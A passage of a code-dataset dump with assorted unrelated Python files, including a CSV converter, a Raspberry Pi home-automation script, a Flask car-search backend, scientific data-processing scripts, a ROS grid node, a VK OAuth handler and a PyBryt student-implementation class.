0:\n features.extend(feature.split(\". \"))\n map(lambda it: it.strip(), features)\n return features\n\n# Command-line arguments\ndef help():\n print(\"Usage: python\", argv[0], \" [out JSON]\")\n\n# Process CSV file\nif not (len(argv) in range(2, 4)):\n help()\n exit(1)\n\ntry:\n jout = list()\n with open(argv[1], newline='') as ifile:\n reader = csv.reader(ifile, delimiter=';')\n header = next(reader)\n data = list(reader)\n for item in data:\n # Split fields into lists by separators\n item[classes] = parse_classes(item[classes])\n item[description] = parse_description(item[description])\n # Zip lists into dicts (JSON objects)\n jout.append(dict(zip(header, item)))\n if len(argv) == 2:\n print(json.dumps(jout, indent=4, ensure_ascii=False))\n elif len(argv) == 3:\n try:\n with open(argv[2], \"w+\") as ofile:\n json.dump(jout, ofile, indent=4, ensure_ascii=False, skipkeys=True)\n except:\n print(\"Error writing output file! Make sure the path valid.\")\nexcept:\n print(\"Error processing input file! Make sure CSV is valid.\\n\")\n help()\n","sub_path":"csv_converter/csv_converter.py","file_name":"csv_converter.py","file_ext":"py","file_size_in_byte":1640,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"275871828","text":"import RPi.GPIO as GPIO\nimport time\nimport urllib3\nimport spidev\n\nGPIO.setmode(GPIO.BOARD)\nGPIO.setwarnings(False)\nGPIO.setup(29,GPIO.OUT)\nGPIO.setup(31,GPIO.OUT)\nGPIO.setup(33,GPIO.OUT)\n\nspi=spidev.SpiDev()\nspi.open(0,0) \n\ndef read_data(channel):\n spi.max_speed_hz=1350000\n if channel>7 or channel <0:\n return\n r=spi.xfer2([1,8+channel<<4,0])\n data=((r[1]&3)<<8)+r[2]\n return data\n\ndef temp(channel):\n temp=read_data(0)\n temp=(temp/204.6)*100\n return temp\n\ndef read_data_base(Component_ID):\n url = \"http://azetech.in/office/scripts/IoT.php?api=ReadValue&ID=\"\n url += Component_ID\n http = urllib3.connection_from_url(url)\n r = http.urlopen('GET',url)\n data = r.data.decode(\"utf-8-sig\").encode(\"utf-8\")\n print(data)\n return data\n\n\ndef Write_Database(Component_ID,data):\n url = \"http://azetech.in/office/scripts/IoT.php?api=UpdateValue&ID=\" + Component_ID + \"&value=\"\n http_pool = urllib3.connection_from_url(url)\n r = http_pool.urlopen('SET',url+(data))\n # print(data)\n\ntry:\n while 1:\n value=temp(0)\n value=str(value)\n print(value[:5]+'c')\n Write_Database(\"IOTCMP00129\",value[:5]+'c')\n # time.sleep(1)\n GPIO.output(29,ord(read_data_base(\"IOTCMP00126\"))-48)\n GPIO.output(31,ord(read_data_base(\"IOTCMP00127\"))-48)\n GPIO.output(33,ord(read_data_base(\"IOTCMP00128\"))-48)\n\nexcept Exception:\n print(\"Program Terminated!\")\n","sub_path":"RPi_Pro/iot_home_automation.py","file_name":"iot_home_automation.py","file_ext":"py","file_size_in_byte":1411,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"94401207","text":"#随机数\nimport random\n\na = random.randint(0, 100)\nn = 0\nwhile n < 6:\n b = eval(input('please input a integer from 1 to 100: '))\n n += 1\n if isinstance(b, int) and b > 0:\n if a < b:\n print('大了')\n elif a > b:\n print('小了')\n else:\n print('猜对了')\n else:\n print('输入错误,请重新输入')\nif a != b:\n print('正确的数是%s' % a)\n\n#99乘法\nfor i in range(1,10):\n for j in range(1,i+1):\n print('%d * %d = %d\\t' % (i,j,i*j),end=' ')\n print(' ')\n","sub_path":"lesson01/heweiping/zuoye.py","file_name":"zuoye.py","file_ext":"py","file_size_in_byte":552,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"467229998","text":"from . import *\nfrom app.irsystem.models.helpers import *\nfrom app.irsystem.models.helpers import NumpyEncoder as NumpyEncoder\nfrom flask import send_from_directory\nfrom flask import request\nfrom json import dumps, loads\nfrom app.irsystem.models.search import Searcher\nfrom app.irsystem.models.imagesearch import ImageSearcher\nfrom statistics import mean\n\nproject_name = \"Vroom Vroom\"\nnet_id = \"Janice Chan: jc2729, Haram Kim: hk592, Stephanie Shum: ss2972, Nataly Rodriguez: nyr2, Jasmine Kitahara: jkk95\"\n\n# create searcher object\nsearcher = Searcher()\nimage_searcher = ImageSearcher()\n\n@irsystem.route('/', methods=['GET'])\ndef search():\n \"\"\"Serve the frontend HTML file\"\"\"\n return render_template('index.html')\n\n@irsystem.route('/manifest.json', methods=['GET'])\ndef send_manifest():\n return send_from_directory('frontend/build', 'manifest.json')\n\n@irsystem.route('/favicon.ico', methods=['GET'])\ndef send_fav():\n return send_from_directory('frontend/build', 'favicon.ico')\n\n@irsystem.route('/static//', methods=['GET'])\ndef send_static(css_js,file):\n print('sending sttic')\n return send_from_directory('frontend/build/static', css_js+'/'+file)\n\n@irsystem.route('/keywords', methods=['GET'])\ndef get_keywords():\n \"\"\"Route to provide the list of good types to the frontend\"\"\"\n return dumps([{\"text\": kw} for kw in searcher.index_to_vocab.values()])\n\n@irsystem.route('/search', methods=['GET'])\ndef do_search():\n \"\"\"Route to handle search requests from frontend.\n Querystring must contain the arguments:\n - size1: First of two car size filter strings; unordered\n - size2: Second of two car size filter strings; unordered\n - minPrice: Minimum price to filter with\n - maxPrice: Maximum price to filter with\n - keywords: A list of strings giving the keywords to be passed to Searcher\n \"\"\"\n # unpack variables from querystring\n size1 = request.args.get(\"size1\")\n size2 = request.args.get(\"size2\")\n min_price = int(request.args.get(\"minPrice\"))\n max_price = int(request.args.get(\"maxPrice\"))\n fuel1 = request.args.get(\"fuel1\")\n fuel2 = request.args.get(\"fuel2\")\n keywords_and_priorities = loads(request.args.get(\"keywords\"))\n\n # TODO: remove this line\n print(keywords_and_priorities)\n\n # convert mapping words to min and max size integers\n mapping = {\"Compact\":0, \"Midsize\":1, \"Large\":2}\n size1 = mapping[size1]\n size2 = mapping[size2]\n min_size = min(size1, size2)\n max_size = max(size1, size2)\n\n fuel_mapping = {\"Gas-Guzzler\":0, \"Standard\":1, \"Fuel-Efficient\":2, \"Hybrid\":3, \"Electric\":4}\n fuel1 = fuel_mapping[fuel1]\n fuel2 = fuel_mapping[fuel2]\n min_fuel = min(fuel1, fuel2)\n max_fuel = max(fuel1, fuel2)\n\n\n # call search method\n search_results = searcher.search(min_size=min_size, max_size=max_size, min_price=min_price,\n max_price=max_price, min_fuel=min_fuel, max_fuel=max_fuel, query=keywords_and_priorities)\n\n\t# generate object to send to frontend\n to_send = []\n for idx, ymm in enumerate(search_results[\"results\"]):\n car = searcher.all_data.get(ymm)\n print(ymm)\n ratings = [float(review[\"Rating\"]) for review in car[\"reviews\"] if review[\"Rating\"].replace('.','',1).isnumeric()]\n \n # extract only the fields we care about to save\n car_to_send = {\"MSRP\": car[\"MSRP\"], \"avg_rating\": mean(ratings), \"ranking\": idx, \"ymm\": ymm}\n\n # get car make-model string to find image\n make_model = car[\"Make\"] + \" \" + car[\"Model\"]\n make_model = make_model.replace(\"/\", \":\")\n try:\n car_to_send[\"img\"] = image_searcher.image_search(make_model).decode('utf-8')\n except:\n pass\n\n # add to list to send\n to_send.append(car_to_send)\n\n # send back json of results from Searcher\n return dumps({\"results\": to_send, \"query\": search_results[\"query\"]})\n\n@irsystem.route('/cardetails', methods=['GET'])\ndef get_details():\n\t\"\"\"Route to provide specific car details to the frontend\"\"\"\n\t# unpack year-make-model from querystring\n\tymm = request.args.get(\"carYMM\")\n\n\t# add average star rating to car\n\tcar = searcher.all_data.get(ymm)\n\tratings = [float(review[\"Rating\"]) for review in car[\"reviews\"] if review[\"Rating\"].replace('.','',1).isnumeric()]\n\tcar[\"avg_rating\"] = mean(ratings)\n\n\t# get car make-model string\n\tmake_model = car[\"Make\"] + \" \" + car[\"Model\"]\n\tmake_model = make_model.replace(\"/\", \":\")\n\n\t# get image; fail silently\n\ttry:\n\t\tcar[\"img\"] = image_searcher.image_search(make_model).decode('utf-8')\n\texcept:\n\t\tpass\n\n\t# return a json of the car data\n\treturn dumps(car, allow_nan=False)\n","sub_path":"app/irsystem/controllers/search_controller.py","file_name":"search_controller.py","file_ext":"py","file_size_in_byte":4631,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"171075602","text":"\"\"\"Module for turning dataset from bats in bat boxes into complete datasets.\nBe sure to use python3 when running this code. By Hugo Loning 2016\n\"\"\"\n\nfrom helper.load_info import load_transects\nfrom helper.write_data import write_array\n\n\ndef load_bats_in_boxes_file(filename):\n \"\"\"Return bats dataset array of specified file including transect information\"\"\"\n tr_array = load_transects()\n bats_array = []\n with open(filename) as bats_file:\n for line in bats_file:\n if line.startswith(\"transect;box\"): # if it's the header\n continue\n # strip and split the line on ; and convert all possible items into int\n line = [int(elem) if elem.isdigit() else elem for elem in line.strip().split(';')]\n # convert bat measurements to float\n try:\n line[9], line[10] = float(line[9]), float(line[10])\n except ValueError: # this will run, unless empty or NA or a case of a value of '>20'\n pass\n # fix box numbering of 75 and 78\n if line[1] == 75 or line[1] == 78: # box 75 is actually 45, just a new door, same for 78 and 48\n line[1] -= 30\n # remove marked individuals\n if line[-1].startswith('marked'): # if individual already caught before on that day\n line[6:] = [0, '', '', '', '', ''] # clear the entry\n # add some additional info\n transect = line[0]\n site, colour = tr_array[transect]\n line.insert(0, site)\n line.insert(3, colour)\n bats_array.append(line)\n return bats_array # [site, transect, box, colour, day, month, year, poo, animals, species, sex, ual, mass, remarks]\n\n\ndef create_data_dict(bats_array):\n \"\"\"Return a dictionary of specified bats array which counts and scores poo (yes/no) for Pp and bats\"\"\"\n data_dict = {}\n for row in bats_array:\n site, transect, box, colour = row[:4]\n poo, nr, species = row[7:10]\n remark = row[-1]\n if transect not in data_dict: # add it\n data_dict[transect] = [site, transect, colour, 0, 0, 0, 0] # [site, tr, clr, pp_poo, bat_poo, pp, bats]\n data_dict[transect][4] = data_dict[transect][4] or poo # update bat_poo\n if not remark.startswith('poo'): # all remarks starting with poo indicate that the poo is not of Pp\n data_dict[transect][3] = data_dict[transect][3] or poo # update pp_poo\n data_dict[transect][6] += nr # update number of bats\n if species == 'pp':\n data_dict[transect][5] += nr # update number of Pippistrellus pippistrellus\n return data_dict\n\n\ndef create_data_array(bats_array):\n \"\"\"Return a dataset array with scored poo and counts for Pp and bats in general,\n also return the header names of this dataset array\n \"\"\"\n data_dict = create_data_dict(bats_array)\n data_array = []\n for tr in data_dict:\n data_array.append(data_dict[tr])\n col_names = ['site', 'transect', 'colour', 'pp_poo', 'bat_poo', 'pp', 'bats']\n return data_array, col_names\n\n\ndef create_body_measurement_array(bats_array):\n \"\"\"Return a dataset array with body measurements and body condition index for all bats,\n also return the header names of this dataset array\n \"\"\"\n meas_array = []\n for row in bats_array:\n sex, ual, mass = row[10:13]\n if sex != '': # if it's a measured bat\n bci_row = row[:-1] # copy everything but the remark\n try:\n bci_row.append(mass / ual)\n except TypeError:\n bci_row.append('NA')\n del bci_row[7:9] # remove information of poo and number of animals (always 1)\n meas_array.append(bci_row)\n col_names = ['site', 'transect', 'box', 'colour', 'day', 'month', 'year', 'species', 'sex', 'ual', 'mass', 'bci']\n return meas_array, col_names\n\n\ndef create_sex_counted_array(bats_array):\n \"\"\"Return a dataset array with counted bats of which sex is known, also return header names\"\"\"\n sex_counted_dict = {}\n for row in bats_array:\n site, transect, box, colour, *rest, species, sex = row[:11]\n if transect not in sex_counted_dict:\n sex_counted_dict[transect] = [transect, site, colour, 0, 0]\n if sex == 'male' and species == 'pp': # count males\n sex_counted_dict[transect][3] += 1\n elif sex == 'female' and species == 'pp': # count females\n sex_counted_dict[transect][4] += 1\n sex_counted_array = []\n for value in sex_counted_dict.values():\n transect, site, colour, male, female = value\n sex_counted_array.append([transect, site, colour, 'male', male])\n sex_counted_array.append([transect, site, colour, 'female', female])\n col_names = ['transect', 'site', 'colour', 'sex', 'pp']\n return sex_counted_array, col_names\n\n\n# Script begins here\nif __name__ == \"__main__\":\n # Specify file to load and files to write\n to_load = 'bats_in_bat_boxes.csv'\n write_bats = 'dataset_bats_in_bat_boxes.csv'\n write_body_measurements = 'dataset_bat_body_measurements.csv'\n write_sex_counted = 'dataset_bats_sex_counted.csv'\n\n # The script\n print(\"BATS IN BAT BOXES DATA CREATION SCRIPT FOR LON BY HUGO LONING 2016\\n\")\n loaded = load_bats_in_boxes_file(to_load)\n print(\"Loaded {}...\\n\".format(to_load))\n array, header_names = create_data_array(loaded)\n write_array(array, header_names, write_bats)\n print(\"Written bats dataset to {}\\n\".format(write_bats))\n measurement_array, headers = create_body_measurement_array(loaded)\n write_array(measurement_array, headers, write_body_measurements)\n print(\"Written body measurements dataset to {}\\n\".format(write_body_measurements))\n sex_counted, columns = create_sex_counted_array(loaded)\n write_array(sex_counted, columns, write_sex_counted)\n print(\"Written sex counted bats dataset to \" + write_sex_counted)\n","sub_path":"bats_in_bat_boxes_dataset_creation.py","file_name":"bats_in_bat_boxes_dataset_creation.py","file_ext":"py","file_size_in_byte":5963,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"621704189","text":"import pandas as pd\r\nimport os\r\nimport re\r\n\r\nclass GoodProfile():\r\n def __new__(cls, *args, **kwargs):\r\n if not hasattr(cls, '_instance'):\r\n cls._instance = super().__new__(cls)\r\n return cls._instance\r\n\r\n\r\n def __init__(self, path = None):\r\n if path != None:\r\n l = os.listdir(path)\r\n self.good_profile_file = None\r\n self.df = None\r\n\r\n for i in l:\r\n m = re.match(r'^商品资料.*\\.xlsx$', i)\r\n if m != None:\r\n self.good_profile_file = i\r\n print(\"开始解析商品资料文件:%s ......\" % self.good_profile_file, end='')\r\n self.df = pd.read_excel(os.path.join(path, self.good_profile_file))\r\n print(\"完成\")\r\n return\r\n print(\"商品资料文件未找到\")\r\n\r\n\r\n def has_profile(self):\r\n '''判断是否存在商品资料文件'''\r\n return not self.df is None\r\n\r\n def get_good_info(self,code):\r\n '''仅能在has_profile()返回True的情况下调用'''\r\n existing = False\r\n create_time = None\r\n\r\n df2 = self.df.loc[self.df['款式编码'] == code]\r\n if len(df2) > 0:\r\n existing = True\r\n create_time = df2.iloc[0]['创建时间']\r\n\r\n return (existing, create_time)\r\n","sub_path":"goods_profile.py","file_name":"goods_profile.py","file_ext":"py","file_size_in_byte":1371,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"534189138","text":"import re, nltk\n\n# file for holding all the functions for cleaning up the data\n\ndef good_ngram(n):\n\t\"\"\"\n\ttakes an ngram and checks to make sure all words are good\n\t\"\"\"\n\tfor w in n:\n\t\tif not good_word(w):\n\t\t\treturn False\n\treturn True\n\ndef good_word(w):\n\t\"\"\"\n\ttakes a word and checks if we want to keep track of it\n\tlike, some junk in COCA is just noise\n\t\"\"\"\n\n\t# we want to exclude punctuation\n\t# the way this works is that it will FORCE us to \n\t# keep moving the 'sliding window' until we're past the\n\t# punctuation -> so that \"big . Blue\" is not saved as a \n\t# trigram\n\tpunc = \"\\&!\\?:@\\.,\\\"\\\\\\/\\$\\'\\%\\)\\(\\*\\#+\"\n\tpunc = re.compile(\"^[\" + punc + \"]\")\n\n\tif len(w) == 0:\n\t\treturn False\n\n\tif re.search(punc,w):\n\t\treturn False\n\n\t# COCA has names of speakers in CAPS\n\tif w == w.upper() and len(w) > 1:\n\t\treturn False\n\n\treturn True\n\ndef clean_line(line):\n\t\"\"\"\n\ttakes a line of text and returns a \"cleaned\" form of the line\n\t\n\t\"\"\"\n\n\t# the way COCA does it is is to split \"\"contractions\"\" into \n\t# separate words, we'll just plop them on the previous word\n\tcontractions = (\"n't\", \"'re\", \"'s\", \"'me\",\n\t\t\"'m\", \"'ll\", \"'ve\", \"'d\")\n\n\tl = line.rstrip().rsplit(\" \")\n\tline = \"\"\n\tfor w in l:\n\t\tcw = clean_word(w)\n\t\t# because COCA makes n't separate words\n\t\tif cw in contractions:\n\t\t\tline = line[:-1] + cw + \" \"\n\t\telse:\n\t\t\tline += cw + \" \"\n\n\treturn(line[:-1])\n\ndef clean_word(w):\n\t\"\"\"\n\ttakes a word and \"cleans\" it, ie folds case and gets rid of weird stuff\n\t\"\"\"\n\tw = w.lower()\n\tw = re.sub(\"(^[\\-\\.]|[\\-\\.;,]$)\",\"\",w)\n\treturn(w)\n\ndef preprocess_COCA():\n\t\"\"\"\n\tpreprossessing - we take in COCA, run EVERYTHING through\n\t# the clean_line fucntion and save the result - so we don't\n\t# need to do it everytime we run\n\t\n\t\"\"\"\n\tprint(\"***PREPROCESSING COCA***\")\n\tprint(\"We're going to open up the COCA file and clean it\", \\\n\t\t\"up so we don't need to do that for every run.\")\n\n\trF = open(\"COCA.cat.txt\", \"r\")\n\twF = open(\"COCA.clean.txt\", \"w\")\n\n\ti = 0\n\tfor line in rF:\n\t\ti+=1\n\t\tprint(\"Doing line\", i, end=\"\\r\")\n\t\twF.write(clean_line(line) + \"\\n\")\n\n\trF.close()\n\twF.close()\n","sub_path":"code/housekeeping.py","file_name":"housekeeping.py","file_ext":"py","file_size_in_byte":2042,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"630886741","text":"#!/usr/bin/env python\nimport rospy, numpy, math\nfrom nav_msgs.msg import GridCells, OccupancyGrid\nfrom geometry_msgs.msg import Point, Twist, Pose, PoseStamped\nfrom Queue import PriorityQueue\nfrom math import sqrt\nfrom astar_goodish import aStar\n\ndef publishColor(color):\n\tglobal pub\n\tpub.publish(color)\n\ndef setGridCells(msg):\n\tglobal cell_width\n\tglobal cell_height\n\tglobal instance\n\tglobal res\n\n\tcell_height = msg.info.height\n\tcell_width = msg.info.width\n\tinstance = msg.data\n\tres = msg.info.resolution\n\ndef drawWalls(grid_pub):\n\tglobal height\n\tglobal width\n\tglobal obstacles_pub\n\ti = 0\n\n\tobstacles=GridCells()\n\tobstacles.header.frame_id = 'map'\n\tobstacles.cell_width = 0.3\n\tobstacles.cell_height = 0.3\n\tfor y in range (0, height):\n\t\tfor x in range (0, width):\n\t\t\tif (grid[i] == 100):\n\t\t\t\tobstacles.cells.append(Point(x*0.3+0.7, y*0.3+0.2, 0))\n\n\t\t\ti = i + 1\n\tobstacles_pub.publish(obstacles)\n\ndef mapCallBack(data):\n\tglobal width\n\tglobal height\n\tglobal grid\n\n\twidth = data.info.width\n\theight = data.info.height\n\tgrid = data.data\n\ndef startPoseCallback(pose):\n\tglobal start\n\n\tx = int(pose.pose.position.x)\n\ty = int(pose.pose.position.y)\n\n\tstart = (x,y)\n\ndef endPoseCallback(pose):\n\tglobal goal\n\n\tx = int(pose.pose.position.x)\n\ty = int(pose.pose.position.y)\n\n\tgoal = (x,y)\n\n# main\nif \t__name__ == \"__main__\":\n\tglobal cell_width\n\tglobal cell_height\n\tglobal instance\n\tglobal res\n\tglobal obstacles\n\tglobal unexplored\n\tglobal width\n\tglobal height\n\tglobal grid\n\tglobal obstacles_pub\n\tglobal start\n\tglobal goal\n\n\trospy.init_node('Color')\n\n\tgrid = list()\n\tstart = (0,0)\n\n\tfrontier_pub = rospy.Publisher('frontier', GridCells, queue_size=10)\n\t# explored_pub = rospy.Publisher('explored', GridCells, queue_size=10)\n\t# shortpath_pub = rospy.Publisher('shortpath', GridCells, queue_size=10)\n\tobstacles_pub = rospy.Publisher('obstacles', GridCells, queue_size=10)\n\tunexplored_pub = rospy.Publisher('unexplored', GridCells, queue_size=10)\n\n\tinitpose_sub = rospy.Subscriber('start_pose', PoseStamped, startPoseCallback, queue_size=10)\n\tfinalpose_sub = rospy.Subscriber('goal_pose', PoseStamped, endPoseCallback, queue_size=10)\n\toccupancygrid_sub = rospy.Subscriber('map', OccupancyGrid, mapCallBack, queue_size=10)\n\nwhile not rospy.is_shutdown():\n\tstoreobs = []\n\tstoreunex = []\n\n\t# frontier\n\t# frontier=GridCells()\n\t# frontier.header.frame_id = 'map'\n\t# frontier.cell_width = 0.3\n\t# frontier.cell_height = 0.3\n\t# frontier.cells = \n\t# frontier.cells.append(Point(1,1,0))\n\n\t# explored\n\t# explored=GridCells()\n\t# explored.header.frame_id = 'map'\n\t# explored.cell_width = 0.3\n\t# explored.cell_height = 0.3\n\t# explored.cells.append(Point(1,2,0))\n\n\t# shortestpath\n\t# shortpath=GridCells()\n\t# shortpath.header.frame_id = 'map'\n\t# shortpath.cell_width = 0.3\n\t# shortpath.cell_height = 0.3\n\t# shortpath.cells.append(Point(1,3,0))\n\n\t# unexplored\n\tunexplored=GridCells()\n\tunexplored.header.frame_id = 'map'\n\tunexplored.cell_width = 0.3\n\tunexplored.cell_height = 0.3\n\tunexplored.cells = storeunex\n\n\t# publish\n\t# frontier_pub.publish(frontier)\n\t# frontier_pub.publish(explored)\n\t#frontier_pub.publish(obstacles)\n\t#frontier_pub.publish(unexplored)\n\t# frontier_pub.publish(shortpath)\n\trospy.sleep(rospy.Duration(1))\n\n\tdrawWalls(grid)\n\n\ttry:\n\t\tgoal\n\texcept NameError:\n\t\tcontinue\n\telse:\n\t\taStar(start, goal, grid)\n\n","sub_path":"src/lab3/ColorGrid1.py","file_name":"ColorGrid1.py","file_ext":"py","file_size_in_byte":3285,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"341501437","text":"class Solution:\n def is_anagram(self, s: str, t: str) -> bool:\n\n if len(s) != len(t):\n return False\n\n countS, countT = {}, {}\n\n for i in range(len(s)):\n countS[s[i]] = 1 + countS.get(s[i], 0)\n countT[t[i]] = 1 + countT.get(t[i], 0)\n\n return countS == countT\n\n\nprint(Solution().is_anagram(\"anagramw\", \"nagaram\"))\n\n\n# rotate string\nstr = \"indal\"\nsize = len(str)\ntemp = str+str\n\nfor x in range(size):\n for y in range(size):\n print(temp[x+y], end=\" \")\n print()\n","sub_path":"strings.py","file_name":"strings.py","file_ext":"py","file_size_in_byte":534,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"166187274","text":"from custom_utils.science.imports import *\nfrom custom_utils.science import basics as sb\nfrom scipy.constants import h\n\nco = sb.dataframe_from_csv(\"../data/DERNER_CO.PRN\", sep=\" \", header=None)\n\n\ndef plot_co(show=False, save=False):\n\n fig = plt.figure()\n ax = fig.add_subplot(111)\n\n ax.plot(co[0], co[1], \"k\", lw=0.5)\n\n ax.set_xlabel(r\"$\\nu[\\si{\\per\\centi\\metre}]$\")\n ax.set_ylabel(r\"Transmitance\")\n # ax.legend()\n ax.autoscale(True, \"x\", True)\n fig.tight_layout()\n\n if show:\n plt.show()\n if save:\n fig.savefig(\"../fig/co.pdf\")\n\n plt.close(fig)\n\n\nu1 = sb.dataframe_from_csv(\"../data/Tomas_Derner_CO.csv\")\nu1 = pd.DataFrame({\"Wavenumber\": u1.Wavenumber.values})\n\nu1_p = u1[:19]\nu1_p = u1_p[::-1].reset_index(drop=True)\nu1_p.set_index(u1_p.index.values + 1, inplace=True)\nu1_r = u1[19:].reset_index(drop=True)\nu1_p = u1_p * 1e2\nu1_r = u1_r * 1e2\n\ny_df = u1_r - u1_p\ny = y_df.Wavenumber.values / (2 * y_df.index.values + 1)\n\nx = (2 * y_df.index.values + 1)**2\n\n\ndef plot_u1_1(show=False, save=False):\n\n fig = plt.figure()\n ax = fig.add_subplot(111)\n\n fit = sb.FitCurve(sb.f_line, x[1:-1], y[1:-1])\n\n ax.plot(*fit.curve(), \":\", c=\"grey\")\n ax.plot(x, y, \"kx\", label=\"hodnoty\")\n\n ax.set_xlabel(r\"x label\")\n ax.set_ylabel(r\"y label\")\n ax.legend()\n fig.tight_layout()\n\n if show:\n plt.show()\n if save:\n fig.savefig(\"../fig/u1_1.pdf\")\n\n plt.close(fig)\n\n return fit\n\n\nfit = plot_u1_1()\na = fit.params[0]\nD_1 = -a / h\nc = fit.params[1]\nB_1 = (c / h + 3 * D_1) / 2\n\n\nu3 = sb.dataframe_from_csv(\"../data/DERNER_VZDUCH.PRN\", sep=\" \", header=None)\n\n\ndef plot_u3(show=False, save=False):\n\n fig, (ax1, ax2) = plt.subplots(nrows=2, figsize=(6, 4))\n\n df = u3[(600 <= u3[0]) & (u3[0] <= 720)]\n ax1.plot(df[0], df[1], \"k\", lw=0.5)\n ax1.set_xlabel(r\"$\\nu[\\si{\\per\\centi\\metre}]$\")\n ax1.set_ylabel(r\"Transmitance\")\n ax1.set_ylim(0.017, 0.031)\n ax1.autoscale(True, \"x\", True)\n\n df = u3[(2230 <= u3[0]) & (u3[0] <= 2400)]\n ax2.plot(df[0], df[1], \"k\", lw=0.5)\n ax2.set_xlabel(r\"$\\nu[\\si{\\per\\centi\\metre}]$\")\n ax2.set_ylabel(r\"Transmitance\")\n ax2.autoscale(True, \"x\", True)\n\n fig.tight_layout()\n\n if show:\n plt.show()\n if save:\n fig.savefig(\"../fig/u3.pdf\")\n\n plt.close(fig)\n","sub_path":"20/comp/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2310,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"283361120","text":"from tornado import web\nfrom tornado import httpclient\n\n\nclass OAuthVk(web.RequestHandler):\n \"\"\"Авторизация в ВК\n on_success(HTTPResponse response) - если не возникло ошибок,\n response - ответ сервера vk\n on_error(error) - в случае возникновеня ошибок\n error - строка с описанием, или exception\n \"\"\"\n\n _ACCESS_TOKEN_URL = 'https://oauth.vk1.com/access_token'\n _AUTHORIZE_URL = 'https://oauth.vk.com/authorize'\n _APP_ID_ = '' # id - приложения (в настройках vk)\n _REDIRECT_URL_ = '' # www.yousite.com/oauth\n _CLIENT_SECRET_ = '' # защищенный ключ приложения (в настройках vk)\n\n def __init__(self, *args):\n super().__init__(*args)\n\n params = {'client_id': self._APP_ID_,\n 'redirect_uri': self._REDIRECT_URL_,\n # 'scope': str(2),\n }\n token_params = {'client_id': self._APP_ID_,\n 'client_secret': self._CLIENT_SECRET_,\n 'redirect_uri': self._REDIRECT_URL_,\n }\n self.token_url = self._ACCESS_TOKEN_URL + '?' + '&'.join([k + '=' + v for k, v in token_params.items()])\n self.code_url = self._AUTHORIZE_URL + '?' + '&'.join([k + '=' + v for k, v in params.items()]) + '&code='\n\n async def get(self):\n vk_code = self.get_argument('code', default=None)\n if vk_code:\n a_http = httpclient.AsyncHTTPClient()\n try:\n response = await a_http.fetch(self.token_url+vk_code)\n except Exception as e:\n self.on_error(e)\n else:\n self.on_success(response)\n else:\n self.redirect(self.code_url)\n\n def on_success(self, response):\n \"\"\"вызывается при удачной авторизации\"\"\"\n raise NotImplementedError(\"on_success\")\n\n def on_error(self, error):\n \"\"\"при ошибке\"\"\"\n raise NotImplementedError(\"on_error\")\n","sub_path":"vk_oauth.py","file_name":"vk_oauth.py","file_ext":"py","file_size_in_byte":2133,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"205363164","text":"\"\"\"Student implementations for PyBryt\"\"\"\n\nimport os\nimport dill\nimport base64\nimport nbformat\n\nfrom typing import Any, List, NoReturn, Optional, Tuple, Union\n\nfrom .reference import ReferenceImplementation, ReferenceResult\nfrom .execution import execute_notebook\n\n\nNBFORMAT_VERSION = 4\n\n\nclass StudentImplementation:\n \"\"\"\n A student implementation class for handling the execution of student work and manging the \n memory footprint generated by that execution.\n\n Args:\n path_or_nb (``str`` or ``nbformat.NotebookNode``): the submission notebook or the path to it\n addl_filenames (``list[str]``, optional): additional filenames to trace inside during \n execution\n output (``str``, optional): a path at which to write executed notebook\n \"\"\"\n\n nb: nbformat.NotebookNode\n \"\"\"the submission notebook\"\"\"\n\n values: List[Tuple[Any, float]]\n \"\"\"the memory footprint (a list of tuples of objects and their timestamps)\"\"\"\n\n start: float\n \"\"\"execution start time\"\"\"\n\n end: float\n \"\"\"execution end time\"\"\"\n\n def __init__(\n self, path_or_nb: Union[str, nbformat.NotebookNode], addl_filenames: List[str] = [],\n output: Optional[str] = None\n ):\n if isinstance(path_or_nb, str):\n self.nb = nbformat.read(path_or_nb, as_version=NBFORMAT_VERSION)\n elif isinstance(path_or_nb, nbformat.NotebookNode):\n self.nb = path_or_nb\n else:\n raise ValueError(f\"path_or_nb is of unsupported type {type(path_or_nb)}\")\n\n self._execute(addl_filenames=addl_filenames, output=output)\n\n def _execute(self, addl_filenames: List[str] = [], output: Optional[str] = None) -> NoReturn:\n \"\"\"\n Executes the notebook ``self.nb``.\n\n Args:\n addl_filenames (``list[str]``, optional): additional filenames to trace inside during \n execution\n output (``str``, optional): a path at which to write executed notebook\n \"\"\"\n self.start, self.end, self.values = execute_notebook(\n self.nb, addl_filenames=addl_filenames, output=output\n )\n\n def dump(self, dest: str = \"student.pkl\") -> NoReturn:\n \"\"\"\n Pickles this student implementation to a file.\n\n Args:\n dest (``str``, optional): the path to the file\n \"\"\"\n with open(dest, \"wb+\") as f:\n dill.dump(self, f)\n\n def dumps(self) -> str:\n \"\"\"\n Pickles this student implementation to a base-64-encoded string.\n\n Returns:\n ``str``: the pickled and encoded student implementation\n \"\"\"\n bits = dill.dumps(self)\n return base64.b64encode(bits).decode(\"ascii\")\n\n @staticmethod\n def load(file: str) -> Union['StudentImplementation']:\n \"\"\"\n Unpickles a student implementation from a file.\n\n Args:\n file (``str``): the path to the file\n \n Returns:\n :py:class:`StudentImplementation`: the unpickled student \n implementation\n \"\"\"\n with open(file, \"rb\") as f:\n instance = dill.load(f)\n return instance\n\n @classmethod\n def loads(cls, data: str) -> \"StudentImplementation\":\n \"\"\"\n Unpickles a student implementation from a base-64-encoded string.\n\n Args:\n data (``str``): the pickled and encoded student implementation\n \n Returns:\n :py:class:`StudentImplementation`: the unpickled student \n implementation\n \"\"\"\n return 